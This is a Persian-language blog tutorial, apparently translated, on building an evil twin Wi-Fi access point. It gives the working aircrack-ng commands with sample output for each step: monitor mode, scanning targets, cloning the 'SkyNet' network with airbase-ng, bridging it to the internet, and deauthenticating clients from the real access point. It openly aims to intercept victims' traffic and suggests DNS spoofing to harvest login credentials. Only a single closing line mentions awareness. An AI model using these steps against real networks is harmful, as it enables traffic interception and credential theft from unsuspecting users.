برنامه نویسی

چگونه یک نقطه دسترسی دوقلو شیطانی ایجاد کنیم. راهنمای گام به گام

راهنمای گام به گام: ایجاد یک دوقلو شیطانی

An Evil Twin Access Point یک نقطه دسترسی بی سیم مخرب است که برای تقلید از یک نقطه دسترسی قانونی تنظیم شده است. می توان از آن برای رهگیری اطلاعات حساس مانند اعتبار ورود، اطلاعات کارت اعتباری و سایر داده های خصوصی استفاده کرد.

در این پست راهنمای گام به گام نحوه ایجاد یک نقطه دسترسی دوقلو شیطانی را ارائه خواهم کرد. شما یاد خواهید گرفت که چگونه یک اکسس پوینت جعلی درست کنید که شبیه واقعی باشد و چگونه داده های قربانیان ناآگاه را رهگیری کنید.

راهنمای ما را دنبال کنید و یاد بگیرید که چگونه یک نقطه دسترسی دوقلو شیطانی را تنها در چند مرحله آسان ایجاد کنید.

*نقطه دسترسی دوقلو شیطانی چیست؟
*

یک دوقلو شیطانی یک نقطه دسترسی بی سیم جعلی است که به عنوان یک هات اسپات واقعی ارائه شده توسط یک ارائه دهنده قانونی ظاهر می شود. ایده راه اندازی یک شبکه بی سیم مخرب با همان نام SSID اصلی است.

دستگاه‌هایی که به شبکه Wi-Fi متصل می‌شوند مانند لپ‌تاپ، تبلت و تلفن‌های هوشمند راهی برای تشخیص دو شبکه Wi-Fi با نام SSID یکسان ندارند. این به هکرها امکان می دهد تا شبکه های بی سیم مخربی را راه اندازی کنند که می توانند ترافیک را ضبط کرده و اطلاعات حساس را از قربانیان استخراج کنند.

*حالت مانیتور را فعال کنید
*

برای شروع با این آموزش، مطمئن شوید که کارت بی سیم شما با مجموعه aircrack-ng سازگار است و حالت مانیتور را فعال کرده است.

Aircrack-ng مجموعه ای محبوب از ابزارهای مورد استفاده برای شکستن شبکه های بی سیم است. این مجموعه ابزارهایی است که شامل aircrack-ng (برای شکستن کلیدهای WEP و WPA-PSK)، airmon-ng (برای تنظیم حالت مانیتور در کارت‌های بی‌سیم) و airodump-ng (برای ضبط ترافیک بی‌سیم) است.

Aircrack-ng یک پروژه منبع باز است و برای ویندوز، لینوکس و macOS در دسترس است. با وارد کردن دستور زیر می توانید بررسی کنید که آیا به درستی کار می کند:

airmon-ng check kill

وارد حالت تمام صفحه شوید

از حالت تمام صفحه خارج شوید

این دستور بررسی می‌کند که آیا کارت بی‌سیم توسط مجموعه aircrack-ng پشتیبانی می‌شود و همچنین هر فرآیندی را که ممکن است با آن تداخل داشته باشد غیرفعال می‌کند.

گام بعدی این است که حالت مانیتور را در رابط بی سیم خود فعال کنید. این را می توان با اجرای دستور airmon-ng start wlan0 انجام داد.

airmon-ng start wlan0

وارد حالت تمام صفحه شوید

از حالت تمام صفحه خارج شوید

با این کار wlan0 به wlan0mon تغییر می کند که نشان می دهد رابط بی سیم شما اکنون در حالت مانیتور است.

*شبکه بی سیم هدف را پیدا کنید
*

مرحله دوم این است که شروع به اسکن روترهای بی‌سیم نزدیک کنید و شبکه Wi-Fi را که می‌خواهید شبیه‌سازی کنید، پیدا کنید. دستور زیر را اجرا کنید:

airodump-ng wlan0mon
CH  6][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2014-05-20 11:10

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
28:EF:01:34:64:92 -29 19 1 0 6 54e WPA2 CCMP PSK Linksys
28:EF:01:35:34:85 -42 17 0 0 6 54e WPA2 CCMP PSK SkyNet
28:EF:01:34:64:91 -29 19 1 0 1 54e WPA2 CCMP PSK TP-LINK
28:EF:02:33:38:86 -42 17 0 0 11 54e WPA2 CCMP PSK CISCO-Net

BSSID STATION PWR Rate Lost Packets Probes

28:EF:01:35:34:85 28:EF:01:23:46:68 -57 0 - 1 0 1
وارد حالت تمام صفحه شوید

از حالت تمام صفحه خارج شوید

شبکه بی سیمی که در این آموزش شبیه سازی خواهم کرد، شبکه SkyNet با BSSID 28:EF:01:35:34:85 و کانال 6 است.

دوقلو شیطانی را ایجاد کنید

هنگامی که شبکه ای را که می خواهید شبیه سازی کنید پیدا کردید، دستور زیر را در ترمینال دیگری اجرا کنید:

airbase-ng -a 28:EF:01:35:34:85 –e SkyNet -c 6 wlan0mon
$ airbase-ng -a 28:EF:01:35:34:85 --essid SkyNet -c 6 wlan0mon
21:39:29  Created tap interface at0
21:39:29  Trying to set MTU on at0 to 1500
21:39:29  Trying to set MTU on wlan0mon to 1800
21:39:29  Access Point with BSSID 28:EF:01:35:34:85 started.
وارد حالت تمام صفحه شوید

از حالت تمام صفحه خارج شوید

این دستور یک شبکه Evil Twin با نام SSID SkyNet ایجاد می کند، اما هنوز نمی تواند دسترسی به اینترنت را فراهم کند.

دسترسی به اینترنت را به Evil Twin ارائه دهید

من رابط پل را اضافه می کنم، به نام جعلی، شما می توانید آن را هر طور که دوست دارید نام گذاری کنید.

brctl addbr fake

وارد حالت تمام صفحه شوید

از حالت تمام صفحه خارج شوید

اکنون دو رابطی که در حال پل زدن هستید، eth0 و at0 را اضافه کنید (مطمئن شوید که eth0 به اینترنت دسترسی دارد).

brctl addif fake eth0
brctl addif fake at0
وارد حالت تمام صفحه شوید

از حالت تمام صفحه خارج شوید

آدرس های IP را به رابط اختصاص دهید و با استفاده از ifconfig آنها را بالا بیاورید:

ifconfig at0 0.0.0.0 up
ifconfig fake up
وارد حالت تمام صفحه شوید

از حالت تمام صفحه خارج شوید

می توانید با ifconfig به رابط شبکه bridge نگاهی بیندازید:

ifconfig
at0       Link encap:Ethernet  HWaddr 74:85:2a  
inet6 addr: fe80::7685:2aff:5b08/64 Scope:Link
UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
RX packets:4 errors:0 dropped:0 overruns:0 frame:0
TX packets:349 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:500 
RX bytes:540 (540.0 B)  TX bytes:54845 (53.3 KiB)
eth0 Link encap:Ethernet HWaddr c8:bc:c8
inet addr:10.0.0.19 Bcast:10.0.0.255 Mask:255.255.255.0
inet6 addr: fe80::cabc:a6c1/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:640 errors:0 dropped:0 overruns:0 frame:0
TX packets:529 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:457344 (446.6 KiB) TX bytes:94347 (92.2 KiB)
Interrupt:17
fake Link encap:Ethernet HWaddr 74:85:2a
inet addr:10.0.0.194 Bcast:10.0.0.255 Mask:255.255.255.0
inet6 addr: fe80:::fe97:5b08/64 Scope:Link
inet6 addr: 2601:d335:7685:2aff:fe97:5b08/64 Scope:Global
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:859 errors:0 dropped:0 overruns:0 frame:0
TX packets:684 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:492405 (480.8 KiB) TX bytes:130130 (127.0 KiB)
وارد حالت تمام صفحه شوید

از حالت تمام صفحه خارج شوید

*مشتریان بی‌سیم را از AP ​​قانونی بیرون بیاورید
*

گام بعدی این است که کلاینت های بی سیم را از AP ​​قانونی کنار بگذاریم، در مورد من، این شبکه SkyNet است. با استفاده از aireplay-ng می توانید این کار را انجام دهید.

aireplay-ng --deauth 1000 -a 28:EF:01:35:34:85 wlan0mon

وارد حالت تمام صفحه شوید

از حالت تمام صفحه خارج شوید

این دستور کلاینت های بی سیم را از شبکه نقطه دسترسی واقعی پرت می کند و آنها را مجبور می کند به نقطه دسترسی مخرب متصل شوند.

همانطور که در خروجی زیر مشاهده می کنید، یک کلاینت با دوقلوی شیطانی من ارتباط برقرار کرده است. این اطلاعات در پایانه airbase-ng یافت می‌شود (مشتری 28:EF:01:23:46:68 مرتبط).

$ airbase-ng -a 28:EF:01:35:34:85 --essid SkyNet -c 6 wlan0mon
14:50:56  Created tap interface at0
14:50:56  Trying to set MTU on at0 to 1500
14:50:56  Trying to set MTU on wlan5 to 1800
14:50:56  Access Point with BSSID 28:EF:01:35:34:85 started.
14:58:55  Client 28:EF:01:23:46:68 associated (WPA2;CCMP) to ESSID: "SkyNet"
15:03:24  Client 28:EF:01:23:46:68 associated (WPA2;CCMP) to ESSID: "SkyNet"
وارد حالت تمام صفحه شوید

از حالت تمام صفحه خارج شوید

در این مرحله، تمام ترافیک قربانی از طریق ماشین مهاجم انجام می‌شود، او می‌تواند اطلاعات حساس را بگیرد، زیرا از نظر فنی یک حمله Man-in-the-Middle است.

مهاجم می تواند حملات مختلفی مانند جعل DNS را انجام دهد که قربانی را به یک صفحه ورود به سیستم شبیه سازی شده یا جعلی هدایت می کند. هنگامی که قربانی سعی می کند وارد سیستم شود، هکر اعتبارنامه را جمع آوری می کند.

نتیجه

در عصر دیجیتال امروزی، استفاده از شبکه های وای فای عمومی برای بسیاری از مردم به یک امر رایج تبدیل شده است. با این حال، مهم است که از خطرات مرتبط با اتصال به این شبکه ها آگاه باشید، زیرا آنها می توانند در برابر حملات سایبری و تلاش های هک آسیب پذیر باشند.

نوشته های مشابه

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

همچنین ببینید
بستن
دکمه بازگشت به بالا